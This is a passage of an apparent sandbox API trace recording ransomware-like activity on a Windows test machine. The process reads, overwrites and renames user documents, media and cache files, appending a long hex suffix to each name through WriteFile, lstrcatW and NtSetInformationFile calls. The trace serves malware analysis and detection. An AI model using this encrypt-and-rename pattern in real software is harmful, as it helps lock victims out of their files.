lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.080] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.080] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.081] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.081] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt", lpString2=".9D85C05FF19D576269BF849C7097C1299886C85036E80BD4443DD13F2D7D9A4E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt.9D85C05FF19D576269BF849C7097C1299886C85036E80BD4443DD13F2D7D9A4E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt.9D85C05FF19D576269BF849C7097C1299886C85036E80BD4443DD13F2D7D9A4E" [0119.081] GetProcessHeap () returned 0x600000 [0119.081] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x31844e0 [0119.081] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x31844e0, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.083] CloseHandle (hObject=0x334) returned 1 [0119.083] GetProcessHeap () returned 0x600000 [0119.083] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.083] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.086] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.086] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.086] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 0x0 [0119.087] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.087] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.088] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt", lpString2=".BB3448CBD7114E45325A2C5371EE32CF4BB4B0626E48264E449194F10D0DB926" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt.BB3448CBD7114E45325A2C5371EE32CF4BB4B0626E48264E449194F10D0DB926") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt.BB3448CBD7114E45325A2C5371EE32CF4BB4B0626E48264E449194F10D0DB926" [0119.088] GetProcessHeap () returned 0x600000 [0119.088] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x3185290 [0119.088] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x3185290, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.089] CloseHandle (hObject=0x334) returned 1 [0119.089] GetProcessHeap () returned 0x600000 [0119.089] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.090] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.093] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.093] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.094] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.095] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt", lpString2=".CC09886730BDC3E2A98255D459A4B64015BEC2EC72671E60604A73C243753648" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt.CC09886730BDC3E2A98255D459A4B64015BEC2EC72671E60604A73C243753648") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_28[1].txt.CC09886730BDC3E2A98255D459A4B64015BEC2EC72671E60604A73C243753648" [0119.095] GetProcessHeap () returned 0x600000 [0119.095] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x3184728 [0119.095] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x3184728, Length=0x240, FileInformationClass=0xa) returned 0x0 [0119.098] CloseHandle (hObject=0x334) returned 1 [0119.098] GetProcessHeap () returned 0x600000 [0119.098] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.098] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.102] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.102] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.103] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x2c7ff70) returned 0x0 [0119.104] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2=".95621021B0AC98B907AEB44B6CA82574FF8E30F06457ECE678F322B1638F4D32" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt.95621021B0AC98B907AEB44B6CA82574FF8E30F06457ECE678F322B1638F4D32") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt.95621021B0AC98B907AEB44B6CA82574FF8E30F06457ECE678F322B1638F4D32" [0119.104] GetProcessHeap () returned 0x600000 [0119.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23e) returned 0x3184e00 [0119.104] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x3184e00, Length=0x23e, FileInformationClass=0xa) returned 0x0 [0119.105] CloseHandle (hObject=0x334) returned 1 [0119.105] GetProcessHeap () returned 0x600000 [0119.105] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.105] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.131] ReadFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0119.131] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0119.139] WriteFile (in: hFile=0x33c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0119.141] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0121.990] WriteFile (in: hFile=0x214, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.993] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0121.993] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2c7ff70) returned 0x0 [0121.994] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\7A ttb5_cWF1ZkeL.wav", lpString2=".B68F1F5FD971820E67D7F08FB33F918A609DAE8FF1AF4E4A40E153E3F4210157" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\7A ttb5_cWF1ZkeL.wav.B68F1F5FD971820E67D7F08FB33F918A609DAE8FF1AF4E4A40E153E3F4210157") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\7A ttb5_cWF1ZkeL.wav.B68F1F5FD971820E67D7F08FB33F918A609DAE8FF1AF4E4A40E153E3F4210157" [0121.994] GetProcessHeap () returned 0x600000 [0121.994] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x138) returned 0x318d7c8 [0121.994] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x2c7ff60, FileInformation=0x318d7c8, Length=0x138, FileInformationClass=0xa) returned 0x0 [0121.995] CloseHandle (hObject=0x214) returned 1 [0121.995] GetProcessHeap () returned 0x600000 [0121.996] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.996] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0123.702] WriteFile (in: hFile=0x30c, lpBuffer=0x33112f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f11b8 | out: lpBuffer=0x33112f0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f11b8) returned 1 [0123.847] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0123.847] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x340e570, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x340e570, ReturnLength=0x2c7ff70) returned 0x0 [0123.847] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\WK95y8welFGA2.mp4", lpString2=".7D7219CBE89C0F14D16500E29724C4489E571BD8CFBBC320DB10B1419AA51A64" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\WK95y8welFGA2.mp4.7D7219CBE89C0F14D16500E29724C4489E571BD8CFBBC320DB10B1419AA51A64") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\WK95y8welFGA2.mp4.7D7219CBE89C0F14D16500E29724C4489E571BD8CFBBC320DB10B1419AA51A64" [0123.847] GetProcessHeap () returned 0x600000 [0123.847] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x132) returned 0x3151bd8 [0123.847] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x3151bd8, Length=0x132, FileInformationClass=0xa) returned 0x0 [0123.874] CloseHandle (hObject=0x33c) returned 1 [0123.874] GetProcessHeap () returned 0x600000 [0123.874] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x340e4c0 | out: hHeap=0x600000) returned 1 [0123.878] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0123.895] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.934] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.042] WriteFile (in: hFile=0x32c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0124.044] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.060] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2c7ff70) returned 0x0 [0124.060] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\-wLjNs963VCw.pptx", lpString2=".1E4E845DEFEAEBF99DA3AEBA146C8F2ACB943A8DBD96A7317A59741E5059A105" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\-wLjNs963VCw.pptx.1E4E845DEFEAEBF99DA3AEBA146C8F2ACB943A8DBD96A7317A59741E5059A105") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\-wLjNs963VCw.pptx.1E4E845DEFEAEBF99DA3AEBA146C8F2ACB943A8DBD96A7317A59741E5059A105" [0124.060] GetProcessHeap () returned 0x600000 [0124.060] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x3368d18 [0124.060] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2c7ff60, FileInformation=0x3368d18, Length=0x120, FileInformationClass=0xa) returned 0x0 [0124.062] CloseHandle (hObject=0x31c) returned 1 [0124.063] GetProcessHeap () returned 0x600000 [0124.063] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.063] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.064] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.065] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\3xaCTo76.docx", lpString2=".B4F4729502F28ADBBAAB2F909E8239AD4699B2FAACC0FAAA6CAD4DBCF746B45A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\3xaCTo76.docx.B4F4729502F28ADBBAAB2F909E8239AD4699B2FAACC0FAAA6CAD4DBCF746B45A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\3xaCTo76.docx.B4F4729502F28ADBBAAB2F909E8239AD4699B2FAACC0FAAA6CAD4DBCF746B45A" [0124.065] GetProcessHeap () returned 0x600000 [0124.065] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x118) returned 0x33682b0 [0124.065] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2c7ff60, FileInformation=0x33682b0, Length=0x118, FileInformationClass=0xa) returned 0x0 [0124.066] CloseHandle (hObject=0x328) returned 1 [0124.067] GetProcessHeap () returned 0x600000 [0124.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.070] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.084] WriteFile (in: hFile=0x33c, lpBuffer=0x338e098, nNumberOfBytesToWrite=0x4a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 0x0 [0124.085] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.094] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.094] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\RovjXe.docx", lpString2=".CB4B476206AC6658FDADC9C161C354D28372B5815CA16C678C917BCB4C76FF07" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\RovjXe.docx.CB4B476206AC6658FDADC9C161C354D28372B5815CA16C678C917BCB4C76FF07") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\RovjXe.docx.CB4B476206AC6658FDADC9C161C354D28372B5815CA16C678C917BCB4C76FF07" [0124.094] GetProcessHeap () returned 0x600000 [0124.094] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15c) returned 0x336ae40 [0124.095] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x336ae40, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0124.096] CloseHandle (hObject=0x33c) returned 1 [0124.096] GetProcessHeap () returned 0x600000 [0124.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.096] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.101] WriteFile (in: hFile=0x33c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.102] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.108] WriteFile (in: hFile=0x33c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.109] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.290] WriteFile (in: hFile=0x328, lpBuffer=0x690478, nNumberOfBytesToWrite=0x2c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0124.293] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.296] WriteFile (in: hFile=0x328, lpBuffer=0x690478, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0124.301] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.305] WriteFile (in: hFile=0x328, lpBuffer=0x690478, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0124.309] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.313] WriteFile (in: hFile=0x328, lpBuffer=0x690478, 